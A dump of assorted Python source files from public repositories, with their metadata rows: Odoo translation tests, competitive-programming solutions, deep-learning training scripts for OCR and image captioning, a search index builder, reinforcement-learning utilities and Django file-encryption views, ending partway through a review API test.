<a class="dropdown-toggle" data-toggle="dropdown" href="#">More <b class="caret"/></a>
<ul class="dropdown-menu" id="menu_more"/>
</li>
</ul>
</t>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['<span class="oe_menu_text">Blah</span>', 'More <b class="caret"/>'])
def test_translate_html(self):
""" Test xml_translate() and html_translate() with <i> elements. """
source = """<i class="fa-check"></i>"""
result = xml_translate(lambda term: term, source)
self.assertEquals(result, """<i class="fa-check"/>""")
result = html_translate(lambda term: term, source)
self.assertEquals(result, source)
class TestTranslation(TransactionCase):
def setUp(self):
super(TestTranslation, self).setUp()
self.env['ir.translation'].load_module_terms(['base'], ['fr_FR'])
self.customers = self.env['res.partner.category'].create({'name': 'Customers'})
self.env['ir.translation'].create({
'type': 'model',
'name': 'res.partner.category,name',
'module':'base',
'lang': 'fr_FR',
'res_id': self.customers.id,
'value': 'Clients',
'state': 'translated',
})
def test_101_create_translated_record(self):
category = self.customers.with_context({})
self.assertEqual(category.name, 'Customers', "Error in basic name_get")
category_fr = category.with_context({'lang': 'fr_FR'})
self.assertEqual(category_fr.name, 'Clients', "Translation not found")
def test_102_duplicate_record(self):
category = self.customers.with_context({'lang': 'fr_FR'}).copy()
category_no = category.with_context({})
self.assertEqual(category_no.name, 'Customers', "Duplication did not set untranslated value")
category_fr = category.with_context({'lang': 'fr_FR'})
self.assertEqual(category_fr.name, 'Clients', "Did not found translation for initial value")
def test_103_duplicate_record_fr(self):
category = self.customers.with_context({'lang': 'fr_FR'}).copy({'name': 'Clients (copie)'})
category_no = category.with_context({})
self.assertEqual(category_no.name, 'Customers', "Duplication erased original untranslated value")
category_fr = category.with_context({'lang': 'fr_FR'})
self.assertEqual(category_fr.name, 'Clients (copie)', "Did not used default value for translated value")
def test_104_orderby_translated_field(self):
""" Test search ordered by a translated field. """
# create a category with a French translation
padawans = self.env['res.partner.category'].create({'name': 'Padawans'})
padawans_fr = padawans.with_context(lang='fr_FR')
padawans_fr.write({'name': 'Apprentis'})
# search for categories, and sort them by (translated) name
categories = padawans_fr.search([('id', 'in', [self.customers.id, padawans.id])], order='name')
self.assertEqual(categories.ids, [padawans.id, self.customers.id],
"Search ordered by translated name should return Padawans (Apprentis) before Customers (Clients)")
| [
"Administrator@20nuo003-PC"
] | Administrator@20nuo003-PC |
b0e17c91d87c7d7e5fcc3f873986d920f6918c16 | 21a561ec0d40554a43dc5a6dfab0f4f62ddb615d | /canteen/base/__init__.py | aaae304df48bbcbcb386327709ca4b1e4a9c8d98 | [
"MIT"
] | permissive | mindis/canteen | 2745a0ebec696d1fbfcc6c4c69582711a4a7e8e6 | a0cf38333417e879712394800a49eb9d0450f96f | refs/heads/master | 2020-12-25T19:15:21.612088 | 2014-02-24T11:29:59 | 2014-02-24T11:29:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | # -*- coding: utf-8 -*-
'''
canteen base
~~~~~~~~~~~~
:author: Sam Gammon <sam@keen.io>
:copyright: (c) Keen IO, 2013
:license: This software makes use of the MIT Open Source License.
A copy of this license is included as ``LICENSE.md`` in
the root of the project.
'''
# import all the things
from .page import *
from .logic import *
from .handler import *
__all__ = (
'page',
'logic',
'handler',
'Page',
'Logic',
'Handler'
)
| [
"sam@keen.io"
] | sam@keen.io |
bc92b0315786a4c62e3b89b66150a21319aea14e | 3ee6c7a9e3191b414dd2e2b48dd0c02b073e6509 | /Codeforces solutions/Jigsaw puzzles.py | e36a897506b67a8b3265bc2bd9f7ab79a1dba594 | [] | no_license | officialstephero/codeforces | 70d334c5ac503a967f1bd7f9a60bc02776d42a96 | db09da45dec49846507eb4f872865ff927b03c81 | refs/heads/main | 2023-09-03T10:40:58.338180 | 2021-11-21T11:51:55 | 2021-11-21T11:51:55 | 430,342,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | n = list(map(int, input().split(' ')))
f = list(map(int, input().split(' ')))
f = sorted(f)
dif = []
for i in range(n[1] - n[0] + 1):
p = f[i:n[0] + i]
dif.append(p[-1] - p[0])
print(min(dif))
| [
"93861108+officialstephero@users.noreply.github.com"
] | 93861108+officialstephero@users.noreply.github.com |
c79dcbd3e94c42a92504220ffb36ebae2587156d | 6d5414a710f09c8a1613e1cb60dfff2d8b37e8ad | /Biweekly Contest 40/Maximum Repeating Substring.py | 62ae08890abed3b5a9fbacc68b6a88d4b8a0ed12 | [] | no_license | prashanthr11/Leetcode | 59985b5037f70933965d509083545e58716b9ec3 | c9a034073062ea01f76448b962152ec8f9b82228 | refs/heads/master | 2023-04-15T09:19:36.526698 | 2021-04-17T16:09:55 | 2021-04-17T16:09:55 | 273,557,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | class Solution:
def maxRepeating(self, a: str, b: str) -> int:
cnt = 0
tmp = b
while b in a:
cnt += 1
b += tmp
return cnt if cnt else 0
| [
"prashanthr6789@gmail.com"
] | prashanthr6789@gmail.com |
0324f681a4d12c47fa524aa35bd3858f1955c899 | 98f730ec6a43d8be4a34b0f2a44a9d35989d2287 | /tests/unit/entity/test_user_groups_entity.py | d83bcc41f01048931032fe2204cd5fa53a0413ae | [] | no_license | scottwr98/pynifi-client | 9337a4f322536ee466d419a788b8b5948cdc62d7 | 013ac2ffa591284a0d6cbb9ed552681cc6f91165 | refs/heads/master | 2020-04-18T08:47:03.680749 | 2017-11-04T23:59:58 | 2017-11-04T23:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,351 | py | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import pynifi_client
from pynifi_client.models.user_groups_entity import UserGroupsEntity # noqa: E501
from pynifi_client.rest import ApiException
class TestUserGroupsEntity(unittest.TestCase):
"""UserGroupsEntity unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testUserGroupsEntity(self):
"""Test UserGroupsEntity"""
# FIXME: construct object with mandatory attributes with example values
# model = pynifi_client.models.user_groups_entity.UserGroupsEntity() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"ajish@rootedinsights.com"
] | ajish@rootedinsights.com |
4d6818fd181734e7ac03a56f5310f9b12201c7cb | 5f819267052b7fb0908d32a9f9d335a5f0bb5294 | /trainer.py | 31f5a45cf33f64efe8b3cfdb134f63066ae8f022 | [] | no_license | Quillbolt/stn-crnn | fe5c4a5178a56071d23d7764ae390cd3641ed80c | c2a72fe856590397a137a6885b2d81c833cf730a | refs/heads/main | 2023-02-20T10:36:24.728234 | 2021-01-20T04:21:46 | 2021-01-20T04:21:46 | 331,189,386 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,964 | py | import torch
from tqdm import *
from utils import *
import torchvision.transforms as transforms
from torch.optim.lr_scheduler import CosineAnnealingLR, StepLR
from torch.nn.utils.clip_grad import clip_grad_norm_
from collections import OrderedDict
from itertools import chain
class OCRTrainer(object):
def __init__(self, opt):
super(OCRTrainer, self).__init__()
self.data_train = opt['data_train']
self.data_val = opt['data_val']
self.model = opt['model']
self.criterion = opt['criterion']
self.optimizer = opt['optimizer']
self.schedule = opt['schedule']
self.converter = OCRLabelConverter(opt['alphabet'])
self.evaluator = Eval()
print('Scheduling is {}'.format(self.schedule))
self.scheduler = CosineAnnealingLR(self.optimizer, T_max=opt['epochs'])
self.batch_size = opt['batch_size']
self.count = opt['epoch']
self.epochs = opt['epochs']
self.cuda = opt['cuda']
self.collate_fn = opt['collate_fn']
# self.noise = opt.noise
self.init_meters()
def init_meters(self):
self.avgTrainLoss = AverageMeter("Train loss")
self.avgTrainCharAccuracy = AverageMeter("Train Character Accuracy")
self.avgTrainWordAccuracy = AverageMeter("Train Word Accuracy")
self.avgValLoss = AverageMeter("Validation loss")
self.avgValCharAccuracy = AverageMeter("Validation Character Accuracy")
self.avgValWordAccuracy = AverageMeter("Validation Word Accuracy")
def forward(self, x):
logits = self.model(x)
return logits.transpose(1, 0)
def loss_fn(self, logits, targets, pred_sizes, target_sizes):
loss = self.criterion(logits, targets, pred_sizes, target_sizes)
return loss
def step(self):
self.max_grad_norm = 0.05
clip_grad_norm_(self.model.parameters(), self.max_grad_norm)
self.optimizer.step()
def schedule_lr(self):
if self.schedule:
self.scheduler.step()
def mixup_data(self, x, y, lengths, alpha):
y = self.evaluator.format_target(y, lengths)
if alpha > 0:
lam = np.random.beta(alpha, alpha)
else:
lam = 1
batch_size = x.size()[0]
index = torch.randperm(batch_size)
mixed_x = lam * x + (1 - lam) * x[index, :]
y_a, y_b = y, [y[i] for i in index]
lengths_b = torch.LongTensor([lengths[i] for i in index])
y_a, y_b = torch.LongTensor(torch.LongTensor(list(chain((*y_a))))), \
torch.LongTensor(torch.LongTensor(list(chain((*y_b)))))
return mixed_x, y_a, y_b, lengths, lengths_b, lam
def _run_batch(self, batch, report_accuracy=False, validation=False):
input_, targets = batch['img'].cuda(), batch['label']
targets, lengths = self.converter.encode(targets)
logits = self.forward(input_)
logits = logits.contiguous().cpu()
logits = torch.nn.functional.log_softmax(logits, 2)
T, B, H = logits.size()
pred_sizes = torch.LongTensor([T for i in range(B)])
targets= targets.view(-1).contiguous()
loss = self.loss_fn(logits, targets, pred_sizes, lengths)
if report_accuracy:
probs, preds = logits.max(2)
preds = preds.transpose(1, 0).contiguous().view(-1)
sim_preds = self.converter.decode(preds.data, pred_sizes.data, raw=False)
ca = np.mean((list(map(self.evaluator.char_accuracy, list(zip(sim_preds, batch['label']))))))
wa = np.mean((list(map(self.evaluator.word_accuracy, list(zip(sim_preds, batch['label']))))))
return loss, ca, wa
def run_epoch(self, validation=False):
if not validation:
loader = self.train_dataloader()
pbar = tqdm(loader, desc='Epoch: [%d]/[%d] Training'%(self.count,
self.epochs), leave=True)
self.model.train()
else:
loader = self.val_dataloader()
pbar = tqdm(loader, desc='Validating', leave=True)
self.model.eval()
outputs = []
for batch_nb, batch in enumerate(pbar):
if not validation:
output = self.training_step(batch)
else:
output = self.validation_step(batch)
pbar.set_postfix(output)
outputs.append(output)
self.schedule_lr()
if not validation:
result = self.train_end(outputs)
else:
result = self.validation_end(outputs)
return result
def training_step(self, batch):
loss, ca, wa = self._run_batch(batch, report_accuracy=True)
self.optimizer.zero_grad()
loss.backward()
self.step()
output = OrderedDict({
'loss': abs(loss.item()),
'train_ca': ca.item(),
'train_wa': wa.item()
})
return output
def validation_step(self, batch):
loss, ca, wa = self._run_batch(batch, report_accuracy=True, validation=True)
output = OrderedDict({
'val_loss': abs(loss.item()),
'val_ca': ca.item(),
'val_wa': wa.item()
})
return output
def train_dataloader(self):
# logging.info('training data loader called')
loader = torch.utils.data.DataLoader(self.data_train,
batch_size=self.batch_size,
collate_fn=self.collate_fn,
shuffle=True)
return loader
def val_dataloader(self):
# logging.info('val data loader called')
loader = torch.utils.data.DataLoader(self.data_val,
batch_size=self.batch_size,
collate_fn=self.collate_fn)
return loader
def train_end(self, outputs):
for output in outputs:
self.avgTrainLoss.add(output['loss'])
self.avgTrainCharAccuracy.add(output['train_ca'])
self.avgTrainWordAccuracy.add(output['train_wa'])
train_loss_mean = abs(self.avgTrainLoss.compute())
train_ca_mean = self.avgTrainCharAccuracy.compute()
train_wa_mean = self.avgTrainWordAccuracy.compute()
result = {'train_loss': train_loss_mean, 'train_ca': train_ca_mean,
'train_wa': train_wa_mean}
# result = {'progress_bar': tqdm_dict, 'log': tqdm_dict, 'val_loss': train_loss_mean}
return result
def validation_end(self, outputs):
for output in outputs:
self.avgValLoss.add(output['val_loss'])
self.avgValCharAccuracy.add(output['val_ca'])
self.avgValWordAccuracy.add(output['val_wa'])
val_loss_mean = abs(self.avgValLoss.compute())
val_ca_mean = self.avgValCharAccuracy.compute()
val_wa_mean = self.avgValWordAccuracy.compute()
result = {'val_loss': val_loss_mean, 'val_ca': val_ca_mean,
'val_wa': val_wa_mean}
return result | [
"khiembka1992@gmail.com"
] | khiembka1992@gmail.com |
0e1f057eb60d71eb77035c425589ccfcfdccfee4 | 46ed61ef3c08908b0be5a9c38f1f6c017577eced | /attention_src/coco_train.py | d4f676d7eb550185eef36996edbafb2284a8bf41 | [] | no_license | miss993/Attention-Modeling-for-Image-Captioning | 4fa05c9c0da34ec8968fe99bdd111461f9969089 | 7a8c67d410b17edb1465eaec522f7f41fff8ea7d | refs/heads/master | 2020-05-24T20:34:15.998191 | 2018-11-17T18:02:10 | 2018-11-17T18:02:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,372 | py | import argparse
import torch
import torch.nn as nn
import numpy as np
import os
import pickle
from coco_data_loader import get_train_loader
from coco_build_vocab import Vocabulary
from coco_model import EncoderCNN, DecoderRNNWithAttention
from torch.nn.utils.rnn import pack_padded_sequence
from torchvision import transforms
"""
While training next time, change crop image to resize image to be consistent.
"""
# Device configuration
device = torch.device('cuda:3' if torch.cuda.is_available() else 'cpu')
print(device)
def main(args):
# Create model directory
if not os.path.exists(args.model_path):
os.makedirs(args.model_path)
# Image preprocessing, normalization for the pretrained resnet
transform = transforms.Compose([
#transforms.RandomCrop(args.crop_size),
transforms.Resize((args.image_size, args.image_size)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406),
(0.229, 0.224, 0.225))])
# Load vocabulary wrapper
with open(args.vocab_path, 'rb') as f:
vocab = pickle.load(f)
# Build data loader
data_loader = get_train_loader(args.image_dir, args.caption_path, vocab,
transform, args.batch_size,
shuffle=True, num_workers=args.num_workers)
# Build the models
encoder = EncoderCNN(args.encoded_image_size).to(device)
decoder = DecoderRNNWithAttention(args.embed_size, args.attention_size, args.hidden_size, len(vocab)).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss().to(device)
params = list(decoder.parameters()) + list(encoder.adaptive_pool.parameters())
optimizer = torch.optim.Adam(params, lr=args.learning_rate)
# Train the models
total_step = len(data_loader)
for epoch in range(args.num_epochs):
for i, (images, captions, lengths) in enumerate(data_loader):
# Set mini-batch dataset
images = images.to(device)
captions = captions.to(device)
lengths = lengths.to(device)
# Forward, backward and optimize
features = encoder(images)
scores, captions, lengths, alphas = decoder(features, captions, lengths, device)
targets = captions[:, 1:]
# Remove padded words to calculate score
targets = pack_padded_sequence(targets, lengths, batch_first=True)[0]
scores = pack_padded_sequence(scores, lengths, batch_first=True)[0]
# cross entropy loss and doubly stochastic attention regularization
loss = criterion(scores, targets)
loss += 1.0 * ((1 - alphas.sum(dim=1))**2).mean()
decoder.zero_grad()
encoder.zero_grad()
loss.backward()
optimizer.step()
# Print log info
if i % args.log_step == 0:
print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}, Perplexity: {:5.4f}'
.format(epoch, args.num_epochs, i, total_step, loss.item(), np.exp(loss.item())))
# Save the model checkpoints
if (i+1 + epoch*total_step) % args.save_step == 0:
torch.save(decoder.state_dict(), os.path.join(
args.model_path, 'decoder-{}-{}.ckpt'.format(epoch+1, i+1)))
torch.save(encoder.state_dict(), os.path.join(
args.model_path, 'encoder-{}-{}.ckpt'.format(epoch+1, i+1)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--model_path', type=str, default='./coco_models_resized/' , help='path for saving trained models')
#parser.add_argument('--crop_size', type=int, default=224 , help='size for randomly cropping images')
parser.add_argument('--image_size', type=int, default=224 , help='size input images')
parser.add_argument('--vocab_path', type=str, default='./data/coco_vocab.pkl', help='path for vocabulary wrapper')
parser.add_argument('--image_dir', type=str, default='../mscoco/resized_train2014', help='directory for resized images')
parser.add_argument('--caption_path', type=str, default='../mscoco/annotations/captions_train2014.json', help='path for train annotation json file')
parser.add_argument('--log_step', type=int , default=100, help='step size for prining log info')
parser.add_argument('--save_step', type=int , default=6000, help='step size for saving trained models')
# Model parameters
parser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors')
parser.add_argument('--encoded_image_size', type=int , default=14, help='dimension of encoded image')
parser.add_argument('--attention_size', type=int , default=384, help='dimension of attention layers')
parser.add_argument('--hidden_size', type=int , default=384, help='dimension of lstm hidden states')
parser.add_argument('--num_epochs', type=int, default=10)
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--num_workers', type=int, default=4)
parser.add_argument('--learning_rate', type=float, default=0.0005)
args = parser.parse_args()
print(args)
main(args)
| [
"chaitanya100100@gmail.com"
] | chaitanya100100@gmail.com |
9363a989c86865fd89d14d0fc1c01f2e8361c7b4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p04011/s295435245.py | 4d2ae76e99072dfb9ca262f4ebf7f3e478f48296 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | N = int(input())
K = int(input())
X = int(input())
Y = int(input())
ans = 0
if N>=K:
ans = K*X+(N-K)*Y
if N<K:
ans = N*X
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f72c2d83842366bb3b5275dacda4c858fffcf29b | 4da53524474bbb91202ae1be9ad312c03cff35c7 | /b58.py | 22f992978676ac447d29be6467b0866ee9f1f3f4 | [] | no_license | sedhuraman146/sedhuprg | 642d1b841085b56843b3c5a1b603a2ca97a66465 | 94f5d1311c1c1ba5379c0d4c3d9e3cc5f4bf2baf | refs/heads/master | 2020-05-15T15:23:01.893750 | 2019-05-14T06:20:16 | 2019-05-14T06:20:16 | 182,371,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | n=int(input("enter the number:"))
c=0
while(n>0):
n=n//10
c=c+1
print(c)
| [
"noreply@github.com"
] | sedhuraman146.noreply@github.com |
1da82694458a1675eda0715f585913a2ace1f065 | cd25757a1ce38f99534f8790e9d4359ab609fc17 | /build_index.py | f6d9ab58ca76b8c373d37eab4bd893fd9a161f81 | [] | no_license | daviddwlee84/SearchEngine | 64be99b2114364e8a0913a51d11215bb3c9806fa | 283d1db39900cddf3a2aad6141bd8c9f253a832a | refs/heads/master | 2023-03-16T17:55:22.135027 | 2021-02-24T09:49:54 | 2021-02-24T09:49:54 | 288,898,452 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,231 | py | # Build index for search models
import os
import sys
import pandas as pd
from tqdm import tqdm
import argparse
curr_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(curr_dir)
from search.annoy.build_index import AnnoyIndexBuilder
from search.elastic_search.build_index import ESIndexBuilder
class IndexBuilder(object):
def __init__(self, annoy_dir: str,
es_index: str, es_host: str,
ignore_ann: bool = False, ignore_es: bool = False):
self.do_ann = not ignore_ann
self.do_es = not ignore_es
if not ignore_ann:
# Note, currently ANN can only be build from scratch (can't add index after load)
# unless we store embedding
self.ann_builder = AnnoyIndexBuilder()
self.ann_dir = annoy_dir
if not ignore_es:
self.es_builder = ESIndexBuilder(host=es_host, index=es_index)
def initialize(self):
"""
Annoy: remove *.ann, mapping.json, *.pkl
ES : delete index
https://stackoverflow.com/questions/47087741/use-tqdm-progress-bar-with-pandas
"""
if self.do_ann:
self.ann_builder.remove_old_files(self.ann_dir)
if self.do_es:
self.es_builder.clear_old_index()
self.es_builder.create_index()
def build_indices_for_pandas_object(self, df: pd.DataFrame):
"""
TODO: dealing with NaN problem (especially pd.NaT in date)
(currently just ignore the date if NaT in elastic search index builder)
"""
for i, row in tqdm(df.iterrows(), total=len(df)):
if self.do_ann:
self.ann_builder.add_index_for_article(index=i, article=row)
if self.do_es:
self.es_builder.add_index_for_article(
index=i, article=dict(row))
def build_indices_for_json_file(self, json_file: str):
# TODO: load stuff and convert the data type, this is important if the memory is limited
pass
def finish(self):
if self.do_ann:
self.ann_builder.build_index()
self.ann_builder.save_index(self.ann_dir)
if self.do_es:
self.es_builder.finish_indexing()
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--annoy-dir', type=str, default=os.path.join(curr_dir, 'index'),
help='Directory to place ANN models and related files.')
parser.add_argument('--es-host', type=str, default='http://stcadmin-dgx-station-002:9200',
help='Elastic search host address.')
parser.add_argument('--es-index', type=str, default='news',
help='Elastic search index to store')
parser.add_argument('--file', type=str, default=os.path.join(curr_dir, 'tools/Crawler/result/news/all_news.tsv'),
help='File to be parse and add')
parser.add_argument('--initialize', action='store_true',
help='Initialize elastic search records (be careful!) and remove annoy model (not necessary).')
parser.add_argument('--ignore-ann', action='store_true',
help='Do not built for ANN.')
parser.add_argument('--ignore-es', action='store_true',
help='Do not built for ES.')
return parser.parse_args()
# python3 SearchEngine/build_index.py --file parsed_tencent.tsv --ignore-ann --initialize
if __name__ == "__main__":
from utils.data_loader import load_tsv
args = parse_args()
builder = IndexBuilder(
annoy_dir=args.annoy_dir, es_host=args.es_host, es_index=args.es_index,
ignore_ann=args.ignore_ann, ignore_es=args.ignore_es)
if args.initialize:
print('Initializing checkpoints and elastic search data.')
builder.initialize()
if args.file.endswith('.tsv'):
df = load_tsv(args.file)
elif args.file.endswith('.json'):
from crawler.manager.combine_results import CombineResult
comb = CombineResult(simplify=True)
df = comb.load_from_json(args.file)
else:
print('Invalid file name', args.file)
exit()
builder.build_indices_for_pandas_object(df)
| [
"daviddwlee84@gmail.com"
] | daviddwlee84@gmail.com |
dfde144f354340ed0365426e42f2d5d79a76425d | 5bf1de9330ef119f4ae9c1206c3bcf4bdbebbb20 | /src/Reinforcement_Learning/utils/model_utils.py | 157d94c7ecf6bd71fc4a09f14c57491c4242250d | [] | no_license | IanQS/blogpostcode | 44fbe128322a0eee5421062af585962bbbc33f14 | 489a89e5ec2d90f3c00e42cb9eb3d142d71d1882 | refs/heads/master | 2020-04-11T02:15:36.532722 | 2019-03-26T15:04:36 | 2019-03-26T15:04:36 | 161,439,760 | 2 | 2 | null | 2019-12-16T21:20:58 | 2018-12-12T05:57:15 | JavaScript | UTF-8 | Python | false | false | 1,526 | py | """
Utilities for the agent
- replay buffer
- OU noise
- etc
Author: Ian Q.
Notes:
"""
from collections import deque
import numpy as np
import numpy.random as nr
from operator import itemgetter
class ReplayBuffer():
def __init__(self, size = 10000):
self.limit = size
self.buffer = deque([], maxlen=self.limit)
def sample(self, batch_size):
random_indices = np.random.choice(np.arange(0, len(self.buffer)), size=batch_size, replace=False)
return itemgetter(*(random_indices.tolist()))(self.buffer)
def insert(self, transition):
self.buffer.append(transition)
def clear(self):
self.buffer = deque([], maxlen=self.limit)
class OUNoise():
# --------------------------------------
# Ornstein-Uhlenbeck Noise
# Author: Flood Sung
# Date: 2016.5.4
# Reference: https://github.com/rllab/rllab/blob/master/rllab/exploration_strategies/ou_strategy.py
# --------------------------------------
def __init__(self, action_dimension, mu=0, theta=0.15, sigma=0.2):
self.action_dimension = action_dimension
self.mu = mu
self.theta = theta
self.sigma = sigma
self.state = np.ones(self.action_dimension) * self.mu
self.reset()
def reset(self):
self.state = np.ones(self.action_dimension) * self.mu
def noise(self):
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * nr.randn(len(x))
self.state = x + dx
return self.state | [
"itq@alumni.cmu.edu"
] | itq@alumni.cmu.edu |
ddaa1e1aeedc42417713853efc45458f1252fa0d | 833651f3d3e72ccc29559292387e33dd337b40b3 | /base_app/views.py | eb6a62bee30276df6a226893cfb92af823bc0ac0 | [] | no_license | yubhrraj/7SemMinorProj | 7fc2c1cf435c443f7d61ee0faf9ca3cb6092f909 | 7435879cac1c1dc7f0df52deed36752f0b39ff9c | refs/heads/master | 2020-04-09T13:25:35.742858 | 2018-12-06T13:39:03 | 2018-12-06T13:39:03 | 160,371,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,872 | py | from django.shortcuts import render
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import View,TemplateView
from .forms import UserForm, linkform
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.contrib.auth import login,logout,authenticate
import pyAesCrypt
from .models import AppUser
from django.contrib.auth.models import User
bufferSize = 64 * 1024
class IndexView(TemplateView):
template_name = 'index.html'
@login_required
def user_logout(request):
logout(request)
return HttpResponseRedirect(reverse('index'))
def register(request):
registered = False
if request.method == "POST":
user_form = UserForm(data=request.POST)
if user_form.is_valid():
user = user_form.save()
user.set_password(user.password)
user.save()
registered = True
else:
print(user_form.errors)
else:
user_form = UserForm()
return render(request, 'register.html', {'user_form':user_form,'registered':registered})
def userlogin(request):
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username= username, password = password)
if user:
if user.is_active:
login(request, user)
return HttpResponseRedirect(reverse('base_app:main'))
else:
return HttpResponse("Account Not active")
else:
print("Well you Failed to login")
return HttpResponse("Invalid Login Details")
else:
return render(request, 'login.html')
@login_required
def mainpage(request):
return render(request, 'loggedindex.html')
@login_required
def trainpage(request):
return render(request, 'trainpage.html')
def testpage(request):
return render(request, 'testpage.html')
@login_required
def encrypt(request):
if request.method=='POST':
password = request.user.appuser.key
uploaded_file=request.FILES['upfile']
# print(uploaded_file.name)
pyAesCrypt.encryptFile(uploaded_file.name, "data.txt.aes", password, bufferSize)
# pyAesCrypt.decryptFile("data.txt.aes", "dataout.txt", password, bufferSize)
return HttpResponseRedirect(reverse('base_app:main'))
def decryptpage(request):
if request.method=='POST':
password = request.user.appuser.key
uploaded_file=request.FILES['document']
# print(uploaded_file.name)
pyAesCrypt.decryptFile(uploaded_file.name, "dataout.txt", password, bufferSize)
return HttpResponseRedirect(reverse('base_app:main'))
return render(request, 'decryptpage.html')
| [
"yubhrraj.p@gmail.com"
] | yubhrraj.p@gmail.com |
68a1af811c9c0d813596a1ba7d0a197abe188521 | 77c3da51b6428d2d830648b5964d842ac96432ab | /03_basic_file_operation.py | 3695231e03894a75f8e03d6022eda9075848f192 | [] | no_license | rh13/i1-python_exercise_on_files | 2adc44db5819ab6de55cb63e5f17a754dfc25d6c | 850ad4eaf7ae95ab5c652f0212358c89f99036ef | refs/heads/master | 2020-03-07T10:45:46.412730 | 2018-03-30T14:54:36 | 2018-03-30T14:54:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | h=open("03_basic_read.txt","r")
with open('03_basic_file_operation.txt','w') as author:
for i in h:
a,b,c=i.split(",")
s="-".join((a,c))
author.write(s)
| [
"rhlikhon13@gmail.com"
] | rhlikhon13@gmail.com |
6dc727f287f4402d70fc96da1581c86a74d66922 | 399ccb8958b17e94d9cd4221bb16ce6ec0e4ccce | /museflow/__init__.py | 33df4447a16bcaae6711f028904c72288ff12e87 | [
"BSD-3-Clause"
] | permissive | tpt-adasp/museflow | de4d108eefe48f990decf60ef06a0c90b77346bf | e5642fd48687a6d3165e213eaab79d5d78d4c0d5 | refs/heads/master | 2022-12-31T06:25:04.094256 | 2020-10-21T21:17:04 | 2020-10-21T21:17:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | import logging
import sys
logger = logging.getLogger('museflow') # pylint: disable=invalid-name
logger.addHandler(logging.NullHandler())
| [
"cifkao@users.noreply.github.com"
] | cifkao@users.noreply.github.com |
c5b2f86108ef15f5f1ac362a8347eaf8587e4578 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_considerable.py | 90514ebc212bd524acaa3c6e06d566fdda7c1fb1 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py |
#calss header
class _CONSIDERABLE():
def __init__(self,):
self.name = "CONSIDERABLE"
self.definitions = [u'large or of noticeable importance: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
93385eb9ba6fb78c134e86b1f2ce26787d68f5fd | 1148206c43cd123e624736be7ba325db5166c0b7 | /src/server/testing/test_reviews.py | bc57027dbbbe92b09bdcf8f54e1f5713c9acc6da | [] | no_license | DAPMElab/TBWA_Vendor_Portal | 6a66e0913abc57981be1b581e33760029b46cebb | 9b5094d5b2247dc14c016caa98aca668f65db023 | refs/heads/master | 2020-04-01T08:32:29.878264 | 2014-06-06T07:17:38 | 2014-06-06T07:17:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,622 | py |
import template
import json
import unittest
import rethinkdb as r
TABLE = 'reviews'
class TestReview(template.TestingTemplate):
""" Tests the API endpoints associated with handling reviews. """
def __create_review(self, review={
'Submitter': 'review submitter',
'CompanyName': 'test_company',
'Rating':10}):
""" method for use in the tests """
outcome = r.table('companies').insert({
'Company' : 'Fake Company',
'URL' : 'Broken URL',
'id' : '123',
'ReviewIds' : []
}).run(self.rdb)
r_resp = self.request_with_role(
'/review/create/123',
method='POST',
data=json.dumps(review)
)
self.assertEqual(r_resp.status_code, 201)
return json.loads(r_resp.data)['uid']
def test_create_success(self):
""" Tests a successful review creation """
review = {
'Rating': 10,
